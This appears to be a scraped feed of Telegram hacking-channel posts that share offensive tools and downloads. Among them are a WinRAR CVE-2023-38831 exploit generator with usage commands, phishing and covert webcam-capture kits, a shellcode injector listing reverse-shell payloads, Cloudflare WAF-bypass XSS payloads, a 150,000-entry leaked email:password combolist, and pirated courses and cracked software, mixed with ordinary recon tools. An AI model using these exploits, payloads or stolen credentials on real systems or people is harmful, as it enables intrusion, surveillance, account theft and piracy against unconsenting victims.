🌟 Happy Mother's Day to all the people of the world 🌟

🪳CVE-2023-38831 winrar exploit generator 🪳

👥 Quick poc test:
Generate the default poc for test

python cve-2023-38831-exp-gen.py poc

or

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf noscript.bat  poc.rar

👤 Custom:
⚪️ Place the bait file and (evil) noscript file in the current directory, the bait file is recommended to be an image (.png, jpg) or a document (.pdf)
⚪️ Run

python cve-2023-38831-exp-gen.py <bait name> <noscript name> <output name>

to generate your exploit

👆 Analysis Blog
👁‍🗨 Reference
😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Winrar #Exploit
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

💜 CloudPeler 💜

📊 CrimeFlare is back again! This tools can help you to see the real IP behind CloudFlare protected websites

👁‍🗨 Introduction:
This tool serves to find the original IP behind websites that have been protected by CloudFlare, the information generated can be useful for further penetration. The information generated by this tool is as follows.

⚪️ CloudFlare IP
⚪️ CloudFlare NS1
⚪️ CloudFlare NS2
⚪️ Real IP
⚪️ Hostname
⚪️ Organization
⚪️ Address (Country, City, Region, Postal Code)
⚪️ Location
⚪️ Time Zone

💻 Code Samples:
This tool is made with PHP code with very simple programming using several APIs to get maximum results, but this tool does not guarantee 100% to be able to bypass websites that have been protected by CloudFlare. Some websites sometimes cannot be detected by their original IP.

📱 Installation:

sudo apt install php-curl
cd CloudPeler
./crimeflare.php exemple.com

😸 Github

⬇️ Download
🔒 BugCod3

#Cloudflare #Bypass #Exploit
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔫 Sn1per 🔫
Attack Surface Management Platform

Discover hidden assets and vulnerabilities in your environment

📊 The ultimate pentesting toolkit
Integrate with the leading commercial and open source vulnerability scanners to scan for the latest CVEs and vulnerabilities.

👁‍🗨 Find what you can't see
Hacking is a problem that's only getting worse. But, with Sn1per, you can find what you can’t see—hidden assets and vulnerabilities in your environment.

🔔 Discover and prioritize risks in your organization
Sn1per is a next-generation information gathering tool that provides automated, deep, and continuous security for organizations of all sizes.

📱 Install:

cd Sn1per
bash install.sh

😸 Github

⬇️ Download
🔒 BugCod3

#Cybersecurity #Pentesting #Sn1per
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Wordpress juicy endpoints

#Wordpress
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🥷 PyPhisher 🥷

▶ A video of the pyphisher tool in action

💬
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.

⬇️ Download
👁‍🗨 Previous Post

#Python #PyPhisher
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🎁Notcoin gives you a gift of 2.5k by entering the bot, and you can increase it during a series of games.
It has not yet been valued, but Pavel Drov (Telegram) has also supported this currency.

Its condition is like the beginning of the Toncoin currency, it has no price, try it for free, there is no harm, maybe one day Telegram itself will become valuable like Toncoin.

@notcoin_bot
💎

⚡️ CamPhish ⚡️

⚠️ The video tutorial is included in the file ⚠️

💬 Grab cam shots from target's phone front camera or PC webcam just sending a link

📊 Features:
⚪️ Festival Wishing
⚪️ Live YouTube TV
⚪️ Online Meeting [Beta]

🔼 Install:

sudo apt-get -y install php openssh git wget
cd CamPhish
bash camphish.sh

😸 Github

⬇️ Download
🔒 BugCod3

#Camera #Hacking #Video #learning
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Shellter 👁

⚠️ The video tutorial is included in the file ⚠️

💬 is a dynamic shellcode injection tool aka dynamic PE infector.

📊 Payloads List:
⚪️ meterpreter_reverse_tcp
⚪️ meterpreter_reverse_http
⚪️ meterpreter_reverse_https
⚪️ meterpreter_bind_tcp
⚪️ shell_reverse_tcp
⚪️ shell_bind_tcp
⚪️ WinExec
⚪️ and many other options...

😸 Github

⬇️ Download
🔒 BugCod3

#shellter #msf #payload #bind
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🐶 SANS All Courses 🐶

💬
Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge they’ve learned the day they return to work.

💸 Price : 100,000 $ Plus ✔️

📂 Size : 152.98 GB

⬇️ Download

#Sans #Courses
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

⚡️ Cloud7 Bot Exploit ⚡️

Run Script with Python 2.7

📊 Recommended:

python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml

⬇️ Download
🔒 @LearnExploit

#Exploit #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

💣 assetfinder 💣

💬 Find domains and subdomains potentially related to a given domain.

🔼 Install:

go get -u github.com/tomnomnom/assetfinder

📂 Usage:

assetfinder [--subs-only] <domain>

😸 Github

⬇️ Download
🔒 BugCod3

#asset #finder #sub #domain
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🧑‍💻 150K Israel Combolist 🇮🇱

💡 Format:
Email:Pass

⬇️ Download
🔒 BugCod3

#Combo #List #Israel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👩‍💻 16K+ ULTIMATE DEEPWEB/ONION LINKS + GUIDE 👩‍💻

⬇️ Download

#Deep #Web
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

💙 Burpsuite Pro 💙

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👻 steghide 👻

💬
Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven.

💡
Steghide is designed to be portable and configurable and features hiding data in bmp, jpeg, wav and au files, blowfish encryption, MD5 hashing of passphrases to blowfish keys, and pseudo-random distribution of hidden bits in the container data.

🕸 Steghide is useful in digital forensics investigations.

🔼 Install:
👩‍💻 Kali:

sudo apt install steghide

⬇️ Download (windows)
🔒 BugCod3

#Steghide #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕷 ExifTool 🕷

💬
Image::ExifTool is a customizable set of Perl modules plus a full-featured command-line application called exiftool for reading and writing meta information in a wide variety of files, including the maker note information of many digital cameras by various manufacturers such as Canon, Casio, DJI, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

📊
The following modules/packages are recommended for specific features, e.g. decoding compressed and/or encrypted information from the indicated file types, calculating digest values for some information types, etc.:

⚪️ Archive::Zip / libarchive-zip-perl: ZIP, DOCX, PPTX,
XLSX, ODP, ODS, ODT, EIP, iWork

⚪️ Unicode::LineBreak / libunicode-linebreak-perl: for column-alignment of alternate language output

⚪️ POSIX::strptime / libposix-strptime-perl: for inverse date/time conversion

⚪️ Time::Piece (in perl core): alternative to POSIX::strptime

⚪️ IO::Compress::RawDeflate + IO::Uncompress::RawInflate (in perl core): for reading FLIF images

⚪️ Compress::Raw::Lzma / libcompress-raw-lzma-perl: for reading encoded 7z files

⚪️ IO::Compress::Brotli + IO::Uncompress::Brotli / libio-compress-brotli-perl: for writing/reading compressed JXL metadata

🔼 Install:
👩‍💻 Kali:

sudo apt install libimage-exiftool-perl

⬇️ Download 🔟👩‍💻👩‍💻
🔒 BugCod3

#Steghide #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦊 DalFox 🦊

💬
DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

🔼 Install:

go install github.com/hahwul/dalfox/v2@latest

💻 Usage:

dalfox [mode] [target] [flags]

👤 Single target mode:

dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
  -b https://your-callback-url

👥 Multiple target mode from file:

dalfox file urls_file --custom-payload ./mypayloads.txt

🪟 Pipeline mode:

cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"

😸 Github

⬇️ Donwload
🔒 BugCod3

#Go #XSS #Scanner #Vulnerability #BugBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javanoscript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<noscript/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

#XSS #Payload #Bypass #CF #WAF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👣 haktrails 👣

💬
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.

📊 Tool Features:
⚪️ stdin input for easy tool chaining
⚪️ subdomain discovery
⚪️ associated root domain discovery
⚪️ associated IP discovery
⚪️ historical DNS data
⚪️ historical whois data
⚪️ DSL queries (currently a prototype)
⚪️ company discovery (discover the owner of a domain)
⚪️ whois (returns json whois data for a given domain)
⚪️ ping (check that your current SecurityTrails configuration/key is working)
⚪️ usage (check your current SecurityTrails usage)
⚪️ "json" or "list" output options for easy tool chaining
⚪️ "ZSH & Bash autocompletion"

🔼 Installation:

go install -v github.com/hakluke/haktrails@latest

💻 Usage:

Gather subdomains

cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains

and...

😸 Github

⬇️ Download
🔒 BugCod3

#Go #Subdomain #IP #Discovery
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3